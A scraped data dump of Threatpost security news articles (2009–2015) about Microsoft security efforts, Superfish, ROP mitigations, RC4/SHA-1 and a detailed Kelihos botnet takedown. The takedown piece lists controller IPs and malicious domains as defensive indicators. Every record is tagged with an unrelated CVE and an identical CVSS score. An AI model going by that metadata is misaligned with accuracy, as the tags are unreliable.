\n](<https://threatpost.com/microsoft-unveil-patch-management-metrics-project-041509/>)\n\nMicrosoft on Wednesday plans to launch a new research effort to determine the total cost of the patch-management cycle, from testing and distributing a fix to user deployment of the patch. The end result of the project, which will be completely open and transparent to outsiders, will be a full metrics model that the company plans to make freely available.\n\nThe metrics project will be handled by the analyst firm Securosis, which will do surveys and interviews with end users and will be responsible for building out the model. Rich Mogull, the firm\u2019s founder, said when Microsoft contacted him about the project he was encouraged by the open, product-neutral way in which the company wanted to approach it. \n\n\u201cThis is not a vendor tool. It\u2019s not product-focused at all,\u201d Mogull said. \u201cIt\u2019s focused on the organizations and the end users. We\u2019re looking at the patch management cycle. What are the total costs for the total cycle, from monitoring what you need to patch all the way to getting the patch out.\u201d\n\nAs part of the process, Securosis will be posting all of the correspondence between the firm and Microsoft about the project, inviting other vendors to participate and make suggestions and encouraging users to comment on the project as it progresses. Mogull said he hopes to have the first version of the model finished by the end of June.\n\nThe project is beng driven on Microsoft\u2019s end by Jeff Jones, a strategy director in the company\u2019s Security Technology Unit. Mogull said that he and Jones have talked at length about the transparency and objectivity requirements around the metrics model.\n\n\u201cOur research model is radically transparent and that\u2019s how this is going to be too,\u201d Mogull said. \u201cEverything will be out in the open. I wouldn\u2019t do something like this if it wasn\u2019t. The goal for the project is to produce an objective, independent model, irrespective of Microsoft.\u201d\n\nMogull has created a separate [Web page](<http://securosis.com/projectquant>) to discuss the project, which is where the materials related to the effort will be available once it gets underway. He lists the goals and deliverables of the effort, which he\u2019s calling Project Quant for now, and emphasizes the open and transparent nature of the project.\n\n\u201cAll materials will be made publicly available throughout the project, including internal communications (the Totally Transparent Research process). The model will be developed through a combination of primary research, surveys, focused interviews, and public/community participation,\u201d Mogull writes.\n\n*Composite header image via [Robert Scoble](<http://www.flickr.com/photos/scobleizer/>)\u2018s Flickr photostream\n", "cvss3": {}, "published": "2009-04-15T11:45:37", "type": "threatpost", "title": "Microsoft to unveil patch management metrics project", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:21", "id": "THREATPOST:F28846A403C73C488A77B766A21BB3E5", "href": "https://threatpost.com/microsoft-unveil-patch-management-metrics-project-041509/72588/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:58:37", "description": "Dennis Fisher and Mike Mimoso discuss the latest security news, including the possible fork of TrueCrypt, Microsoft\u2019s new information sharing platform, the FBI\u2019s cybercrime task force and the US team\u2019s crushing tie with Portugal.\n\nDownload: [digital_underground_156.mp3](<http://traffic.libsyn.com/digitalunderground/digital_underground_156.mp3>)\n\nMusic by Chris Gonsalves\n\n[](<https://itunes.apple.com/us/podcast/digital-underground-podcast/id315355232?mt=2>)\n", "cvss3": {}, "published": "2014-06-23T15:17:13", "type": "threatpost", "title": "Threatpost News Wrap, June 23, 2014", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-11-25T15:52:47", "id": "THREATPOST:415E19FC1402E6223871B55143D39C98", "href": "https://threatpost.com/threatpost-news-wrap-june-23-2014/106812/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:55:57", "description": "Microsoft has taken steps to impede the next Superfish from impacting users.\n\n[Superfish was pre-installed adware](<https://threatpost.com/lenovo-superfish-certificate-password-cracked/111165/>) found on new Lenovo laptops earlier this year. The software exposes users to man-in-the-middle attacks because of the way it injects advertisements into the browser. It comes with a self-signed root cert that generates certs for HTTPS connections, replacing existing certs with its own in the process. Attackers could take advantage of this scenario\u2014especially after the password for the cert that shipped with Superfish was found\u2014to listen in on encrypted communication.\n\nMicrosoft this week said it has [updated its rules around adware](<https://blogs.technet.microsoft.com/mmpc/2015/12/21/keeping-browsing-experience-in-users-hands/>), and now such programs that build ads in the browser are required to only use the browser\u2019s \u201csupported extensibility model for installation, execution, disabling and removal.\u201d Microsoft said starting March 31, 2016 it will detect and begin removing programs that are not in compliance.\n\n\u201cThe choice and control belong to the users, and we are determined to protect that,\u201d wrote Barak Shein and Michael Johnson of Microsoft\u2019s Malware Protection Center.\n\nLenovo quickly patched the original Superfish issue and shortly thereafter, browser makers such as [Mozilla removed the root cert from Firefox\u2019s trusted root store](<https://threatpost.com/mozilla-pushes-hot-fix-to-remove-superfish-cert-from-firefox/111335/>).\n\nSuperfish\u2019s ability to perform SSL interception by proxy was certainly worrisome behavior from a supposedly trusted product, one that was suddenly opening the door not only to man-in-the-middle attacks, but also the manipulation of DNS settings and other network-layer attacks. Worse yet was that Superfish-like software would not trigger warnings about man-in-the-middle attacks.\n\n\u201cAll of these techniques intercept communications between the Internet and the PC to inject advertisements and promotions into webpages from outside, without the control of the browser,\u201d Microsoft said. \u201cOur intent is to keep the user in control of their browsing experience and these methods reduce that control.\u201d\n", "cvss3": {}, "published": "2015-12-23T09:01:25", "type": "threatpost", "title": "Microsoft Bans Superfish SSL Interception Adware", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2015-12-23T14:01:25", "id": "THREATPOST:DD69574508B1751B9C9B01C26AE809C1", "href": "https://threatpost.com/microsoft-to-remove-superfish-like-programs-starting-in-march/115730/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:02:32", "description": "**By Rob Lemos**\n\nLAS VEGAS \u2014 If Jared DeMott hadn\u2019t been eager to take a different path, he would never be in security, much less a finalist in Microsoft\u2019s search for defensive technologies, known as the Blue Hat Prize.Raised in a manufacturing town, he was accepted to the Air Force Academy in 1996, but instead went to study computer networks at Ferris State University in Michigan. In 2000, he planned to take an offer with State Farm, a popular employer of Ferris\u2019s computer-science graduates, but instead went out to interview, and accept a job, with a government agency about which he knew nothing \u2014 the National Security Agency.\n\nAnd when it came to Microsoft\u2019s Blue Hat contest, DeMott shook off a lot of criticism from friends and colleagues for even considering looking at developing defensive technologies. Like many researchers in the security industry, he had focused on offense, not defense, regularly participating in capture-the-flag competitions. A year ago following the [announcement of the contest](<https://threatpost.com/katie-moussouris-microsoft-blue-hat-prize-082411/>) at the Black Hat security conference, a good friend from his hacking team told him to play to his strengths.\n\n\u201cBut then I went home and I started thinking about it more, and I thought, \u2018You know, I teach a class on application security, I do a lot more defense than I think I do,'\u201d he says. \u201cThe prizes weren\u2019t bad, and it would be neat to see if I could apply myself to defensive technologies.\u201d\n\nDeMott is one of three finalists vying for the $200,000 grand prize, the winner of which will be announced at a party on Thursday night here. In total, Microsoft had 20 qualifying submissions, the majority of which focused on mitigating return-oriented programming attacks \u2014 the topic of all three finalists\u2019 research efforts.\n\nROP allows attackers to create exploits by co-opting legitimate operating system functions and piecing them together to run code. The result of iterative development in the security community for more than a decade, ROP allows an attacker to [sidestep more modern operating system defenses](<http://blog.zynamics.com/2010/03/12/a-gentle-introduction-to-return-oriented-programming/>), such as non-executable memory \u2014 also known as data execution prevention \u2014 and code signing.\n\nIn this year\u2019s Pwn2Own contest, for example, security consultant Charlie Miller of Accuvant [used return-oriented programming](<https://threatpost.com/five-years-later-iphones-legacy-secure-062912/>) to get around non-executable memory on Apple\u2019s iOS mobile operating system to compromise an iPhone through a vulnerability in the Safari Web browser.\n\n\u201cReturn oriented programming is the technique that is being used in more and more real-world exploits,\u201d says Mike Reavey, senior director at Microsoft\u2019s Security Response Center. \u201cOne of the judging criteria was impact and whether the solution would block real-world impact.\u201d\n\nDeMott\u2019s entry into Blue Hat, known as \u201c/ROP,\u201d checks the target address every time that a procedure returns from executing code on the stack. While its not a perfect defense, it has low overhead, executes quickly, and integrates well with Microsoft software, the company says.\n\nIvan Fratric, a teaching and research assistant at the University of Zagreb in Croatia, took a different approach. His proposal, known as ROPGuard, monitors a set of critical functions that are frequently used to implement return-oriented programming. When a function is called by a program, ROPGuard checks to see if the reference is legitimate or not.\n\nFratric, who has been researching security for nearly five years, first got interested in the field as a way to understand how hackers are able to manipulate computer systems. Prior to the Blue Hat contest, he had taken a more offensive approach, focusing on finding vulnerabilities. It took Microsoft\u2019s $200,000 prize and challenge to the security community to have him focus on developing better defenses.\n\nWith ROPGuard, Fratric aimed to use as much of the information available at runtime as possible. Figuring out when to do the checks was a major component of his technique. If the attacker is going to use ROP, then he typically calls specific functions to set up the system for his attack, Fratric says. For example, an attacker might call functions that make certain areas of memory executable or load a certain code component.\n\n\u201cThese functions are a great place to put these runtime checks,\u201d he says. \u201cMy approach uses runtime checks on these processes \u2014 some simple, some not so simple.\u201d\n\nFratric has already succeeded in getting his technology adopted by Microsoft. The software giant has already added four checks from ROPGuard to the [Enhanced Mitigation Experience Toolkit](<http://technet.microsoft.com/en-us/security/ff859539.aspx>), an optional software update used to harden Windows systems.\n\nThe last finalist, Columbia University PhD student Vasilis Pappas, has completed nearly six years of security research as part of his doctoral thesis. His submission, kBouncer, is the result of research that he had begun in the year before the Blue Hat announcement. The basic idea is it uses the kernel to police requests made by processes and reject anything that could be return-oriented programming.\n\n\u201cWhenever an application is requesting something from the kernel, kBouncer will check to see if it impacts security, and allow or deny the request,\u201d Pappas says.\n\nPappas grew up in Greece, attending university there before coming to the United States. A main attraction of the Blue Hat prize was to develop a technology that will be used by millions of people, he says. While researching the technology caused headaches for other finalists, the most difficult part of developing kBbouncer was getting it to run on Windows, Pappas says. He is much more comfortable with Unix-based systems.\n\nThe contest has already paid off for each of the finalists and for Microsoft, says Reavey.\n\n\u201cBeyond the money, one of the things (all the contestants) want is to engage more actively in the security researcher community,\u201d Reavey says. \u201cIt certainly is good recognition for their efforts that they have been selected as finalists.\u201d\n", "cvss3": {}, "published": "2012-07-26T21:23:32", "type": "threatpost", "title": "From Three Nations and Three Different Perspectives, Blue Hat Finalists Focus on Defense", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-24T20:08:26", "id": "THREATPOST:9758835CBD1761636E1E39F36A79936B", "href": "https://threatpost.com/three-nations-and-three-different-perspectives-blue-hat-finalists-focus-defense-072612/76856/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:04:01", "description": "MIAMI BEACH\u2013It\u2019s been a decade now since Microsoft began focusing on product security as a top priority and there have been a lot of successes and some failures along the way. But in that time, one of the things that most definitely has changed as a result of the Trustworthy Computing program is how difficult and expensive it\u2019s become for attackers to compromise Windows machines. That\u2019s not to say, however, that the fight has been won. It\u2019s only beginning, in fact, a senior Microsoft security official said.\n\nThere are a lot of bits and pieces that comprise [Microsoft\u2019s Trustworthy Computing](<https://threatpost.com/ten-years-after-gatess-memo-effects-still-being-felt-011212/>) efforts, from developer training to exploit mitigations to outreach to the security researchers who spend their time attacking the company\u2019s products. But the one thing that all of these initiatives have in common is that they\u2019re focused on increasing the time, effort and investment it takes for an attacker to compromise one of their products. Increasing that degree of difficulty and level of spending by even small increments can provide much larger gains on the defensive side.\n\n\u201cFor stealthy, reliable exploits, you need a lot of R&amp;D and they\u2019re shorter-lived now. It\u2019s getting harder to find bugs and exploits,\u201d Andrew Cushman, senior director of Trustworthy Computing security at Microsoft, said in his keynote talk at the Infiltrate conference here Friday. \u201cThe defender\u2019s ethos is to increase attacker investment. Copy what works and keep plugging away. We\u2019re in this for the long haul.\u201d\n\nAlthough the famous directive from Bill Gates on Trustworthy Computing went out in 2002, one of the first real watershed moments in the company\u2019s efforts to lock down its products was the release of Windows XP SP2 in 2004. That was the first version of the OS to have the Windows firewall turned on by default, and included some other security upgrades as well. Cushman pointed to that as an inflection point for both Microsoft and the attackers who target its systems.\n\n\u201cPre-XP SP2 was the golden age for exploits. Things have only gotten harder since then,\u201d he said. \u201cThose were the days. It was then that the executives said, we\u2019re going to take the steps that are necessary to fix this.\u201d\n\nThose changes were not limited to Windows products, though. The company\u2019s IIS Web server was a frequent and easy target for attackers in the early part of the decade, and that fact did not escape senior management at Microsoft.\n\n\u201cOne of the low points of my career is when Jim Allchin stood up in a meeting and said IIS was a threat to Windows,\u201d Cushman said.\n\nThings have certainly changed since then, but that doesn\u2019t mean that all is sweetness and light for Microsoft or the Internet at large. Sure, it\u2019s become progressively more difficult to find and reliably exploit vulnerabilities in many platforms, but there are still plenty of other systems out there that haven\u2019t caught up. And though life may be more challenging for the dedicated attackers and offensive teams out there, they\u2019re not out of business by any means.\n\n\u201cAttackers are being squeezed from the top and the bottom. But low-skill exploits never go out of style. There\u2019s lots of low-hanging fruit out there, 1990s technology,\u201d Cushman said. \u201cBut for high skill exploits, the barrier to entry is growing. And there\u2019s no shortage of vulnerable technologies that are going to come online in the next few years.\u201d\n\nDespite all of the changes, Cushman said, one thing has remained the same throughout the years.\n\n\u201cAttackers are never going to go away,\u201d he said.\n", "cvss3": {}, "published": "2012-01-13T15:31:13", "type": "threatpost", "title": "Microsoft Aims to Make Life Harder, More Expensive For Attackers", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:33:00", "id": "THREATPOST:80978215EBC2D47937D2F3471707A073", "href": "https://threatpost.com/microsoft-aims-make-life-harder-more-expensive-attackers-011312/76094/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:04:45", "description": "Earlier this week, Microsoft released a**[](<https://threatpost.com/botnet-shutdown-success-story-how-kaspersky-lab-disabled-hluxkelihos-botnet-092911/>)**n announcement about the disruption of a dangerous botnet that was responsible for spam messages, theft of sensitive financial information, pump-and-dump stock scams and distributed denial-of-service attacks.\n\nKaspersky Lab played a critical role in this botnet takedown initiative, leading the way to reverse-engineer the bot malware, crack the communication protocol and develop tools to attack the peer-to-peer infrastructure. We worked closely with Microsoft\u2019s Digital Crimes Unit (DCU), sharing the relevant information and providing them with access to our live botnet tracking system.\n\nA key part of this effort is the sinkholing of the botnet. It\u2019s important to understand that the botnet still exists \u2013 but it\u2019s being controlled by Kaspersky Lab. In tandem with Microsoft\u2019s move to the U.S. court system to disable the domains, we started to sinkhole the botnet. Right now we have 3,000 hosts connecting to our sinkhole every minute. This post describes the inner workings of the botnet and the work we did to prevent it from further operation.\n\nLet\u2019s start with some technical background: Kelihos is Microsoft\u2019s name for what Kaspersky calls Hlux. Hlux is a peer-to-peer botnet with an architecture similar to the one used for the Waledac botnet. It consists of layers of different kinds of nodes: controllers, routers and workers. Controllers are machines presumably operated by the gang behind the botnet. They distribute commands to the bots and supervise the peer-to-peer network\u2019s dynamic structure. Routers are infected machines with public IP addresses. They run the bot in router mode, host proxy services, participate in a fast-flux collective, and so on. Finally, workers are infected machines that do not run in router mode, simply put. They are used for sending out spam, collecting email addresses, sniffing user credentials from the network stream, etc. A sketch of the layered architecture is shown below with a top tier of four controllers and worker nodes displayed in green.\n\n\n\n_Figure 1: Architecture of the Hlux botnet_\n\n**Worker Nodes**\n\nMany computers that can be infected with malware do not have a direct connection to the Internet. They are hidden behind gateways, proxies or devices that perform network address translation. Consequently, these machines cannot be accessed from the outside unless special technical measures are taken. This is a problem for bots that organize infected machines in peer-to-peer networks as that requires hosting services that other computers can connect to. On the other hand, these machines provide a lot of computing power and network bandwidth. A machine that runs the Hlux bot would check if it can be reached from the outside and if not, put itself in the worker mode of operation. Workers maintain a list of peers (other infected machines with public IP addresses) and request jobs from them. A job contains things like instructions to send out spam or to participate in denial-of-service attacks. It may also tell the bot to download an update and replace itself with the new version.\n\n**Router Nodes**\n\nRouters form some kind of backbone layer in the Hlux botnet. Each router maintains a peer list that contains information about other peers, just like worker nodes. At the same time, each router acts as an HTTP proxy that tunnels incoming connections to one of the Controllers. Routers may also execute jobs, but their main purpose is to provide the proxy layer in front of the controllers.\n\n**Controllers**\n\nThe controller nodes are the top visible layer of the botnet. Controllers host a nginx HTTP server and serve job messages. They do not take part in the peer-to-peer network and thus never show up in the peer lists. There are usually six of them, spread pairwise over different IP ranges in different countries. Each two IP addresses of a pair share an SSH RSA key, so it is likely that there is really only one box behind each address pair. From time to time some of the controllers are replaced with new ones. Right before the botnet was taken out, the list contained the following entries:\n\n193.105.134.189 \n193.105.134.190 \n195.88.191.55 \n195.88.191.57 \n89.46.251.158 \n89.46.251.160\n\n**The Peer-to-Peer Networks**\n\nEvery bot keeps up to 500 peer records in a local peer list. This list is stored in the Windows registry under HKEY_CURRENT_USERSoftwareGoogle together with other configuration details. When a bot starts on a freshly infected machine for the first time, it initializes its peer list with some hard-coded addresses contained in the executable. The latest bot version came with a total of 176 entries. The local peer list is updated with peer information received from other hosts. Whenever a bot connects to a router node, it sends up to 250 entries from its current peer list, and the remote peer send 250 of his entries back. By exchanging peer lists, the addresses of currently active router nodes are propagated throughout the botnet. A peer record stores the information shown in the following example:\n\nm_ip: 41.212.81.2 \nm_live_time: 22639 seconds \nm_last_active_time: 2011-09-08 11:24:26 GMT \nm_listening_port: 80 \nm_client_id: cbd47c00-f240-4c2b-9131-ceea5f4b7f67 \nThe peer-to-peer architecture implemented by Hlux has the advantage of being very resilient against takedown attempts. The dynamic structure allows for fast reactions if irregularities are observed. When a bot wants to request jobs, it never connects directly to a controller, no matter if it is running in worker or router mode. A job request is always sent through another router node. So, even if all controller nodes go off-line, the peer-to-peer layer remains alive and provides a means to announce and propagate a new set of controllers.\n\n**The Fast-Flux Service Network**\n\nThe Hlux botnet also serves several fast-flux domains that are announced in the domain name system with a TTL value of 0 in order to prevent caching. A query for one of the domains returns a single IP address that belongs to an infected machine. The fast-flux domains provide a fall-back channel that can be used by bots to regain access to the botnet if all peers in their local list are unreachable. Each bot version contains an individual hard-coded fall-back domain. Microsoft unregistered these domains and effectively decommissioned the fall-back channel. Here is the set of DNS names that were active before the takedown \u2013 in case you want to keep an eye on your DNS resolver. If you see machines asking for one of them, they are likely infected with Hlux and should be taken care of.\n\nhellohello123.com \nmagdali.com \nrestonal.com \neditial.com \ngratima.com \npartric.com \nwargalo.com \nwormetal.com \nbevvyky.com \nearplat.com \nmetapli.com\n\nThe botnet further used hundreds of sub-domains of ce.ms and cz.cc that can be registered without a fee. But these were only used to distribute updates and not as a backup link to the botnet.\n\n**Counteractions**\n\nA bot that can join the peer-to-peer network won\u2019t ever resolve any of the fall-back domains \u2013 it does not have to. In fact, our botnet monitor has not logged a single attempt to access the backup channel during the seven months it was operated as at least one other peer has always been reachable.\n\nThe communication for bootstrapping and receiving commands uses a special custom protocol that implements a structured message format, encryption, compression and serialization. The bot code includes a protocol dispatcher to route incoming messages (bootstrap messages, jobs, SOCKS communication) to the appropriate functions while serving everything on a single port. We reverse engineered this protocol and created some tools for decoding botnet traffic. Being able to track bootstrapping and job messages for a intentionally infected machine provided a view of what was happening with the botnet, when updates were distributed, what architectural changes were undertaken and also to some extend how many infected machines participate in the botnet.\n\n\n\n_Figure 2: Hits on the sinkhole per minute_\n\nThis Monday, we started to propagate a special peer address. Very soon, this address became the most prevalent one in the botnet, resulting in the bots talking to our machine, and to our machine only. Experts call such an action sinkholing \u2013 bots communicate with a sinkhole instead of its real controllers. At the same time, we distributed a specially crafted list of job servers to replace the original one with the addresses mentioned before and prevent the bots from requesting commands. From this point on, the botnet could not be commanded anymore. And since we have the bots communicating with our machine now, we can do some data mining and track infections per country, for example. So far, we have counted 49,007 different IP addresses. Kaspersky works with Internet service providers to inform the network owners about the infections.\n\n\n\n_Figure 3: Sinkholed IP addresses per country_\n\n**What now?**\n\nThe main question is now: what is next? We obviously cannot sinkhole Hlux forever. The current measures are a temporary solution, but they do not ultimately solve the problem, because the only real solution would be a cleanup of the infected machines. We expect that the number of machines hitting our sinkhole will slowly lower over time as computers get cleaned and reinstalled. Microsoft said their Malware Protection Center has added the bot to their Malicious Software Removal Tool. Given the spread of their tool this should have an immediate impact on infection numbers. However, in the last 16 hours we have still observed 22,693 unique IP addresses. We hope that this number is going to be much lower soon.\n\nInterestingly, there is one other theoretical option to ultimately get rid of Hlux: we know how the bot\u2019s update process works. We could use this knowledge and issue our own update that removes the infections and terminates itself. However, this would be illegal in most countries and will thus remain theory.\n\n_Tillmann Werner is a senior malware analyst at Kaspersky Lab._\n", "cvss3": {}, "published": "2011-09-29T15:10:41", "type": "threatpost", "title": "The Inside Story of the Kelihos Botnet Takedown", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-05-01T20:51:46", "id": "THREATPOST:E77302403616F2E9A6C7DA2AD2B1F880", "href": "https://threatpost.com/botnet-shutdown-success-story-how-kaspersky-lab-disabled-hluxkelihos-botnet-092911/75703/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:59:49", "description": "The [RC4](<http://threatpost.com/attack-exploits-weakness-rc4-cipher-decrypt-user-sessions-031413/77628>) and SHA-1 algorithms have taken a lot of hits in recent years, with new attacks popping up on a regular basis. Many security experts and cryptographers have been recommending that vendors begin phasing the two out, and Microsoft on Tuesday said that is now recommending to developers that they deprecate RC4 and stop using the SHA-1 hash algorithm.\n\nRC4 is among the older stream cipher suites in use today, and there have been a number of practical attacks against it, including plaintext-recovery attacks. The improvements in computing power have made many of these attacks more feasible for attackers, and so Microsoft is telling developers to drop RC4 from their applications.\n\n\u201cIn light of recent research into practical attacks on biases in the RC4 stream cipher, Microsoft is recommending that customers enable TLS1.2 in their services and take steps to retire and deprecate RC4 as used in their TLS implementations. Microsoft recommends TLS1.2 with AES-GCM as a more secure alternative which will provide similar performance,\u201d Microsoft\u2019s William Peteroy said in a [blog post](<https://blogs.technet.com/b/srd/archive/2013/11/12/security-advisory-2868725-recommendation-to-disable-rc4.aspx?Redirected=true>).\n\n\u201cOne of the first steps in evaluating the customer impact of new security research and understanding the risks involved has to do with evaluating the state of public and customer environments. Using a sample size of five million sites, we found that 58% of sites do not use RC4, while approximately 43% do. Of the 43% that utilize RC4, only 3.9% require its use. Therefore disabling RC4 by default has the potential to decrease the use of RC4 by over almost forty percent.\u201d\n\nThe software company also is recommending that certificate authorities and others stop using the SHA-1 algorithm. Microsoft cited the existence of known collision attacks against SHA-1 as the main reason for advising against its use. Also, after January 2016, Microsoft developers can no longer use SHA-1 in code-signing or developer certificates.\n\n_Image from Flickr photos of [Josh Bancroft](<http://www.flickr.com/photos/joshb/>). _\n", "cvss3": {}, "published": "2013-11-12T16:07:39", "type": "threatpost", "title": "Microsoft Warns Customers Away From RC4, SHA-1", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-11-14T18:14:04", "id": "THREATPOST:E7C5C8276111C637456F053327590E4C", "href": "https://threatpost.com/microsoft-warns-customers-away-from-sha-1-and-rc4/102902/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:57:01", "description": "SAN FRANCISCO\u2013One of the downsides to being a software company with a huge customer base is that your products are going to be prime targets for attackers. But the flip side to that coin is that you\u2019re going to gather a _lot_ of data about vulnerabilities and attacks.\n\nMicrosoft has been collecting that data for years now and has used it to help inform decisions about new defensive technologies, product improvements and patching strategies. The company shared some of that information Tuesday at the RSA Conference here and some of the data they have is quite revealing. One of the most intriguing bits to come out of the numbers is that while there are still large numbers of remote code execution vulnerabilities being disclosed every year, attackers are exploiting fewer and fewer of them.\n\n\u201cVulnerabilities represent potential risk. But until somebody goes through the effort to develop an exploit that leverages that vulnerability, the risk isn\u2019t actualized. The percentage of remote code execution vulnerabilities that are actually exploited is declining. The actual risk appears to be going down based on what we see,\u201d said Matt Miller, principal security software engineer in the Microsoft Security Response Center. \u201cThe absolute number of those bugs continues to decline, as well.\u201d\n\nRemote code execution vulnerabilities are attacker catnip, and that\u2019s especially true of RCE bugs in widely deployed software such as browsers and operating systems. For years, attackers had a field day with vulnerabilities in Internet Explorer and Windows, particularly buffer overflows. Rare was the Patch Tuesday that didn\u2019t include fixes for a buffer overflow or six. But Microsoft has put a lot of resources and effort into making those bugs more difficult to exploit, and Miller said the work has paid off.\n\nIn fact, he said the company didn\u2019t see a single stack corruption exploit in 2014.\n\n\u201cA couple of things have driven that. The Security Development Lifecycle has helped us eradicate these classes of bugs. And we\u2019ve driven mitigations and improvements that have helped too,\u201d Miller said. \u201cIn practice, this isn\u2019t a vulnerability class that people go after anymore.\u201d\n\nThose changes have forced the attacker community to shift gears. Miller said attackers have started targeting use-after-free vulnerabilities more often and have moved heavily into return-oriented programming, a technique that can be used to bypass exploit mitigations in software. At the same time, the rise of easily available exploit kits such as [Angler](<https://threatpost.com/domain-shadowing-latest-angler-exploit-kit-evasion-technique/111396>), [Blackhole](<https://threatpost.com/black-hole-exploit-kit-20-released-091212/77000>) and others have made it much simpler for attackers to go after new vulnerabilities. And the exploits are showing up in those kits much more quickly than ever before.\n\nDavid Weston, principal program manager on the Microsoft One Protection team, who spoke alongside Miller, said that as recently as the beginning of 2014 it was taking roughly 30 days for exploits for a newly patched vulnerability to show up in the common exploit kits. By the end of the year, it was within ten days of the patch. And now, not only are the kit developers adding exploits for known bugs, but they are in some cases putting in exploits for undisclosed vulnerabilities.\n\n\u201cBy the beginning of this year, we\u2019re seeing the primary exploit kit developers introducing zero days,\u201d Weston said. \u201cThe trickle-down effect is changing, as we\u2019re seeing many more of these crimeware kits source things for themselves. That\u2019s a dramatic change.\u201d\n", "cvss3": {}, "published": "2015-04-21T17:41:22", "type": "threatpost", "title": "Microsoft Data Shows Drop in Remote Code Execution Bugs Being Exploited", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2015-04-21T21:41:22", "id": "THREATPOST:AD3C2C361C6E263CA6B217D740D6C09F", "href": "https://threatpost.com/microsoft-data-shows-drop-in-remote-code-execution-bugs-being-exploited/112371/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:58", "description": "[From ZDNet (Ryan Naraine)](<http://blogs.zdnet.com/security/?p=3553>)\n\nMicrosoft\u2019s batch of patches this month is a big one: 10 bulletins covering a total of 31 documented vulnerabilities affecting the Windows OS, the Internet Explorer browser and the Microsoft Office productivity suite (Word, Works and Excel).\n\nFive of the 10 bulletins are rated \u201ccritical,\u201d Microsoft\u2019s highest severity rating. Among the patches this month are fixes for [a pair of IIS WebDav flaws that were publicly disclosed](<http://blogs.zdnet.com/security/?p=3424>) last month and cover for the [CanSecWest Pwn2Own vulnerability](<http://blogs.zdnet.com/security/?p=2951>) that was used to exploit Internet Explorer on Windows 7. Read the full story [here](<http://blogs.zdnet.com/security/?p=3553>).\n", "cvss3": {}, "published": "2009-06-09T20:26:38", "type": "threatpost", "title": "Microsoft unleashes 31 fixes on Patch Tuesday", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:09", "id": "THREATPOST:E937B281CB0B5D1061AAD253FA4ACB53", "href": "https://threatpost.com/microsoft-unleashes-31-fixes-patch-tuesday-060909/72724/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:07:39", "description": "[](<https://threatpost.com/patch-tuesday-microsoft-kills-pwn2own-browser-bug-060810/>)The Microsoft Patch Tuesday train rolled into town today, dropping off a massive 10 security bulletins with fixes for at least 34 documented vulnerabilities. \n\nThree of the bulletins are rated \u201ccritical\u201d because of the risk of remote code execution attacks. Affected products include the Windows operating system, Microsoft Office, the Internet Explorer browser and Internet Information Services (IIS).\n\nThis month\u2019s patch batch also provides cover for a known cross-site scripting flaw in the Microsoft SharePoint Server and a publicly discussed data leakage hole in Internet Explorer.\n\nMicrosoft is urging its users to pay special attention to [MS10-033](<http://www.microsoft.com/technet/security/Bulletin/MS10-033.mspx>) (Windows), [MS10-034](<http://www.microsoft.com/technet/security/Bulletin/MS10-034.mspx>) (ActiveX killbits) and [MS10-035](<http://www.microsoft.com/technet/security/Bulletin/MS10-035.mspx>) (Internet Explorer) because these contain fixes for issues that may be exploited by malicious hackers very soon.\n\nHere\u2019s the skinny on these three bulletins:\n\n * [MS10-033](<http://www.microsoft.com/technet/security/Bulletin/MS10-033.mspx>) \u2014 This security update resolves two privately reported vulnerabilities \nin Microsoft Windows. These vulnerabilities could allow remote code \nexecution if a user opens a specially crafted media file or receives \nspecially crafted streaming content from a Web site or any application \nthat delivers Web content. This is rated Critical for Quartz.dll \n(DirectShow) on Microsoft Windows 2000, Windows XP, Windows Server 2003, \nWindows Vista, and Windows Server 2008; Critical for Windows Media \nFormat Runtime on Microsoft Windows 2000, Windows XP, and Windows Server \n2003; Critical for Asycfilt.dll (COM component) on Microsoft Windows \n2000, Windows XP, Windows Server 2003, Windows Vista, Windows Server \n2008, Windows 7, and Windows Server 2008 R2; and Important for Windows \nMedia Encoder 9 x86 and x64 on Microsoft Windows 2000, Windows XP, \nWindows Server 2003, Windows Vista, and Windows Server 2008.\n * [MS10-034](<http://www.microsoft.com/technet/security/Bulletin/MS10-034.mspx>) \u2014 This security update addresses two privately reported vulnerabilities \nfor Microsoft software. This security update is rated Critical for all \nsupported editions of Microsoft Windows 2000, Windows XP, Windows Vista, \nand Windows 7, and Moderate for all supported editions 